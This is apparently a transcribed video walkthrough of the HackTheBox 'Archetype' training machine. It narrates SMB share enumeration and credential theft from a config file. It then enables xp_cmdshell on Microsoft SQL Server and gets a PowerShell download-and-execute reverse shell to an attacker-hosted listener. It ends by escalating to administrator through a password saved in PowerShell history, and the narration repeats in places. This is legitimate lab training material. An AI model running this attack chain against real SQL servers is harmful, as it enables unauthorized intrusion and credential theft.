So this SQL statement will request file ps1 from here, and then this server will actually give the file to this. Okay, so this download string will send the string as an expression, and this invoke expression will send it here, and then PowerShell will execute, and then we get a reverse shell right here. Okay, so let's see that in action. So it should work. Let's hit enter, and boom, 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 and we got a shell. And if you just hit enter, you see a PowerShell command line. So how cool is that? Hey amazing hackers, I'm TORHAT from Cyber Academy. Today we'll be looking at Archetype box from tier 2 of starting point of HackTheBox. Archetype is a Windows machine, and you will have a chance to exploit the misconfiguration of Microsoft SQL Server, and we will try to get a reverse shell in most fun way possible. Okay, so you're gonna enjoy this a lot. So first of all, connect your VPN. I have already done it. And next is spawn this machine. I have already done that. So first of all, you change your IP addresses, echo $myIP. So you captured this IP address and say sudo nano zshell rc, and here you change this IP address and save it. Once you save it, previously we have said that you need to restart this terminal like this, but this time we're going to change this. So clear and simply say zshell. Okay, so if you have bash, you use bash, but I'm using zshell, so I'm opening a new zshell terminal using zshell. Okay, and if you type echo $IP, this IP has been updated. And now to check if I can reach it, so I'll just use ping command, and now I can reach it. So the next step in our standard process is this one. So just copy and paste it, and now you can see bunch of open ports, right? So out of this, we know that 135, 445 or 139, all of these resemble to SMB, right? So we can open a new terminal and start hacking SMB servers. SMB client -L and IP. Okay, so this particular command just lists out all the SMB shares on this particular IP address. Okay, so let's hit enter. It's asking for a password. Let's give a blank password. So here I can see that there are 3 shares that are created by default, and this one is the only one that is custom made share. Okay, so to open this share, what we have to do is SMB client / IP $IP and say backups. Okay, so at this IP address we need to access this share. So if you hit enter, so we're getting a connection error. So let's try it again. So previously it was a timeout situation, so now we got it, and here looks like our nmap scan is done. So let's store all the results. So let's copy, let's go here. Okay, so this one is SMB share, right? So these are old SMB shares, so these are still working, but we don't need to touch them right now. These are run on NetBIOS, so it needs something extra, but this one is straight away accessible. Okay, and if you see this one, port 1433 is having Microsoft SQL Server. Interesting. So the computer name is Archetype. Okay, do we get anything else? So this is Windows, right? So we need to use Windows related stuff to access these files. Okay, so now you can see that it returns a file called prod.dts-config. So let's get this file. So finally, by using this command, so we got the file. So you can exit out of this SMB. So we are out. So clear ls cat prod. So here you can see something like DTS configuration. So what is DTS configuration? Let's check that out. A DTS config file is an XML configuration file used to apply property values to SQL Server integration services. which is also called SSIS packages. Okay, so only one particular port has that SQL server running, right? That is Microsoft SQL Server. So it has to be related to Microsoft SQL Server. Okay, so let's go back, and as you can see, this particular string says the password and the username. Okay, so let's copy that. And we also know that Archetype is the computer name. Okay, so you can just remove this particular Archetype, and now you got username as SQL SVC and password as this. Okay, so let's check these credentials and confirm this using crackmap exec. Okay, let's clear this. Crackmap exec Microsoft SQL and $IP, and username is SQL SVC and password is this one. Okay, so let's run it. And also in the meantime, let's check some answers. Which TCP port is hosting the database server? It's 1433. What is the name of the non-administrative share available in SMB? So it was backups. So other administrative shares were admin, IPC and C. Okay, so only one custom share is backups. What is the password identified in the file in the SMB share? So this is the password, right? Megacorp123. Okay, so it returned nothing. So looks like so many people are working on this particular IP address, or our VPN might be slow. Okay, so one of those two cases. So let's check once again. Okay, cool. So crackmap exec worked perfectly and it gave us pound, which means this username and this password can be used to log in to Microsoft SQL database. Okay, so to use this, we are going to use some tool called Impacket. Okay, so Impacket is a collection of Python classes for working with network protocols. So Impacket is focused on providing low-level programmatic access to the packets. And for some protocols like SMB or MSRPC, it can go to such level that it can implement the protocol implementation itself. Okay, so it's just part of Python. Okay, so Python and say module pip and install Impacket. So this is how you install if you don't have Impacket installed in your PC. So it says requirements already satisfied. Once this is done, all you have to do is locate mssql client.py. So this is Microsoft SQL client. So we will act as a client and we'll try to connect to the server using the username and password we got. Okay, so how to use this? You say Python 3 and give this file followed by the username at the IP address, and you also need to mention Windows auth, which means use Windows authentication to log into this. Okay, so it might ask for a password. So when you see this prompt, give this password. So while it connects, let's go back and see which script is used. So it is mssql client.py, right? So this is the script that we used. So let's paste it. What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell? Okay, so basically it was an old stored procedure. So it is designed during the time of Windows XP. Okay, it is just XP command shell. So this is the one. So it's very old, but this will be used even now. Okay, to spawn a shell by using this particular stored procedure. So we'll be using this once we connect to the database. What script can be used in order to search the possible paths to escalate privileges on Windows host? There is some script that is specifically designed for privilege escalations. Okay, so if you type privilege escalation GitHub. Okay, so if you click on this, you can see that PEAS, which is privilege escalation awesome script. Okay, so it comes with, so these scripts can be worked with Mac OS, Linux machines and also Windows machines. So if you go to this releases, should be able to see Windows. So you can check this Windows PEAS, which is Privilege Escalation Awesome Script, x64.exe. Okay, so we'll be using this to elevate privilege escalation once we got a shell. Okay, so it is WinPeace. All right, SQL shell. So in brief, I'll explain how this XP command shell works. Okay, so XP command shell is a system stored procedure in SQL Server. Okay, it allows executing Windows shell commands from the SQL environment itself. Okay, so it spawns a Windows command shell and passes the string for execution. So any input is returned as rows of text for us. Okay, how to use XP command shell? So we cannot use it right away. So we have to use exec because we are in SQL environment. Okay, so you're saying execute this particular command shell so that it will spawn a shell, and from there you execute the command. So let's use basic commands like cd. So this cd is different from what we use in our Linux. Okay, so it's basically like pwd in Linux. So if you hit enter, SQL Server blocked access to stored procedure, system command shell. Okay, so this is the default thing. So it blocks access to system procedure like this. So to bypass this, we need to execute some commands. Okay, so first one is we need to select is server role member, which is currently us. It should be like sysadmin. Okay, so we're saying it make this role as sysadmin. So let's see if this works. Execute sp configure show advanced options comma 1. So what you're saying is you execute this and show me more options so that I can enable this one. So let's set it to 1. So it is changed it to 1. So you need to say reconfigure. So this particular statement to install it. Okay, so we have installed it. So the next thing you can do is execute sp configure xp command shell and set it to 1. So it is set to 1. So reconfigure to install it. So it is installed right now. So this particular server seems to be crashed again. So we cannot execute anymore. So you need to exit and run it again. So copy, paste and hit enter. Okay. So let's try to use execute command shell to see if it changed. Execute xp command shell and cd. Okay, now it's working. So looks like this actually worked. Okay, it installed xp command shell configuration. So now we were able to execute some commands. So let's see if we can access some other locations. Okay, so cd // users. So we know that users directory exists in this particular location, right? Okay, so let's see. Okay, we haven't changed a bit. You can try using capital C : / users. So let's see if this works. Looks like it's not changing, but commands are being executed, right? So we know that this particular user exists, right? We can access some user flags and root flags, right? Where do they usually store it? They usually store it in their desktops. So what you can do is you can create C : / and user.txt. Any of the C drive. So the C drive contains users, and this users contain username, and username contains desktops, and in this desktop you contain user flag, right? So let's see if this particular user.txt exists. Then we are going to get some user flag. So just type it out. Okay, so we got the user flag. So can we get the root flag? So root flag is in this location, right? Root.txt, and it is located in administrator. So this is basically where the flag is located. Okay, so access is denied. So we don't have administrator access to access this particular file. So first of all, we get into that machine and get a shell, and then we try to access administrator privileges, and only then we will be able to access this root.txt. So we can try and execute PowerShell reverse shell command. It sounds cool, right? PowerShell reverse shell. Okay. So this is the first GitHub link, and here you see a one-liner. So just click on raw and you see this whole script. So this hashtag is nothing but a comment, so just ignore it. So let's copy this part, new terminal nano ps.ps1. This is a PowerShell script. So let's keep going backwards and see if I can change some things. Okay, look at this. So I will be running a netcat listener over here. This IP address will be my IP address. Okay, remove this, paste it over here, and let's say 1234. Okay, so this will be my netcat listener. So let's save it, a Python 3 HTTP server, and this HTTP server will run at port 8000. Let's see if this is still active. Okay, it crashed, so let's exit and even close this as well. So I want it to be more visible, so I'm opening right here and say netcat -nlvp 1234. Okay, so this one, so paste it, send it. So what command do we execute so that we get a reverse shell? So since we are sending a ps1 file, so we need to be executing PowerShell command. PowerShell and IEX. IEX is nothing but invoke expression. So we are sending an expression and it should execute that particular expression. Okay, so in this expression we are saying create a new object. New object should be like a net web client. So we are creating a temporary web client. Okay, so that web client has to download a string from the location that we mention, http :/ our IP address and say port 8000. So this is where this is located, right? So we're gonna say this particular file. So just bring this file and download the string using this particular web client, and whatever is in the string, which is the contents of this file, so just send that string to this PowerShell. Okay, that's what this means. Okay, once you understand everything, now we will see how the flow actually works. So this SQL statement will request file ps1 from here, and then this server will actually give the file to this. Okay, so this download string will send the string as an expression, and this invoke expression will send it here, and then PowerShell will execute, and then we get a reverse shell right here. Okay, so let's see that in action. So it should work. Let's hit enter and boom, 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 and we got a shell. And if you just hit enter, you see a PowerShell command line. So how cool is that? What privileges do we have? Let's say, who am I? I am SQL SVC, which means the only thing that I can access or write or even control is the one which is located right here. Okay, cd c:\users SQL SVC. Okay, so this is where I have full access. cd desktop, and if I type dir, I can see user.txt. Okay, so basically this is my location, which is SQL SVC location. Okay, so I can bring some files into here and I can execute them right here. Okay, because I have access, this is mine. Okay, so which file do I want here and execute? Okay, so I have basic privileges, so let me get some more privileges using WinPiece that we have discussed over here. Okay, copy link and paste it over here, and now I'm downloading it. So I'm already running a Python server here, right? I can still use this Python server and get this Windows privilege escalation file. Go here and say wget, because wget will be installed by default in Windows as well, and say http IP address and at port 8000. What is the file name? WinPiece x64 exe. Okay, so this is the file that I want, out file. So I want it to be named as winpiece x64.exe. Okay, so let's hit enter and I'm getting that file. I got a 200 OK response. Okay, looks like I got it. So to check that, I just type dir and I can see that I got this file. Okay, so I no longer need this. Exit out of here. So I'm going to zoom terminal. So to execute this, // copy, paste it and execute. Okay, it just dumped us all the data that we need. Okay, so you can just scroll through them and see which one really stands out. Okay, one such file is this. Okay, nt user data, or you can check this history file. So this particular console host history file is the history file that was generated when SQL SVC tried to use PowerShell for some reason. So let's type this thing and I can see that it tries to log in as administrator using this password. Okay, so if you go back to HackTheBox, which file contains administrator password? This is the file that contains administrator password. So let's copy this, paste it over here, submit. So what is the user flag? So user flag is located right here. Type user.txt and this is the user flag. Control C, Control V. And what is the root flag? So you have to be an administrator for the root flag, right? So now you have the password and username. So now you can log in as administrator using evil winrm. Okay, exiting out from here and evil winrm and IP address $IP and user administrator and password megacorp admin. Paste it over here and send it. So looks like I am an administrator. Cool. So let's go back, cd cd desktop and I can see root.txt. So type root.txt. Okay, cool. So let's copy this, paste it right here and submit. I hope you enjoyed this one and I'll see you guys in the next one. Peace.